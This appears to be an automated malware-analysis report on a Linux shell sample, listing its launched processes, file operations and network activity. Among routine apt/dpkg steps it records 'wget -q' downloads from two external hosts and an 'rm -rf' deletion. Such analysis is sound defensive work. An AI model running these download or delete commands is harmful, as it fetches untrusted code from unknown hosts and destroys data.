Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- clear
- ip route get 8.8.8.8
- awk -Fsrc NR==1{split($
- rm -rf V1.0
- wget -q http://vipscript.cf/lisans/folder/V1.0
- wget -q http://dizaynsunucum.org/lisans/folder/vip/
- sleep 0.4
- apt-get -y install figlet
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
- /usr/bin/dpkg --assert-multi-arch
- /usr/bin/apt-listchanges --apt
- /bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
- /usr/sbin/dpkg-preconfigure --apt
- locale charmap
- sh -c stty -a 2>/dev/null
- stty -a
- /usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/figlet_2.2.5-2_amd64.deb
- dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/figlet_2.2.5-2_amd64.deb
- dpkg-deb ##/var/cache/apt/archives/figlet_2.2.5-2_amd64.deb /var/lib/dpkg/tmp.ci
- tar -x -f - --warning=no-timestamp
Kills the following processes:
- /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
- /var/cache/apt/pkgcache.bin.9qhiwH
- /var/log/apt/term.log
- /var/log/apt/history.log
- /var/lib/dpkg/tmp.ci/md5sums
- /var/lib/dpkg/tmp.ci/control
- /var/lib/dpkg/tmp.ci/prerm
- /var/lib/dpkg/tmp.ci/postinst
Creates folders:
- /var/lib/dpkg/tmp.ci
Deletes folders:
- /var/lib/dpkg/tmp.ci
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/pkgcache.bin.9qhiwH
- /var/cache/apt/archives/lock
- /var/cache/apt/archives/partial/figlet_2.2.5-2_amd64.deb
- /var/lib/apt/listchanges.db
- /var/log/apt/term.log
- /var/log/apt/history.log
- /var/lib/dpkg/updates/tmp.i
- /var/lib/dpkg/triggers/Lock
- /var/log/dpkg.log
- /var/lib/dpkg/tmp.ci/md5sums
- /var/lib/dpkg/tmp.ci/control
- /var/lib/dpkg/tmp.ci/prerm
- /var/lib/dpkg/tmp.ci/postinst
- /var/lib/dpkg/tmp.ci//control
- /var/lib/dpkg/tmp.ci//md5sums
- /var/lib/dpkg/tmp.ci//prerm
- /var/lib/dpkg/tmp.ci//postinst
- /dev/pts/0
Deletes files:
- /usr/games/V1.0
- /var/cache/apt/pkgcache.bin
- /var/lib/dpkg/reassemble.deb
Locks files:
- /var/cache/debconf/config.dat
- /var/cache/debconf/passwords.dat
- /var/cache/debconf/templates.dat
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- ft#.##.######.#####ebian/pool/main/f/figlet/figlet_2.2.5-2_amd64.deb
DNS ASK:
- vi###ript.cf
- di####sunucum.org
- ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information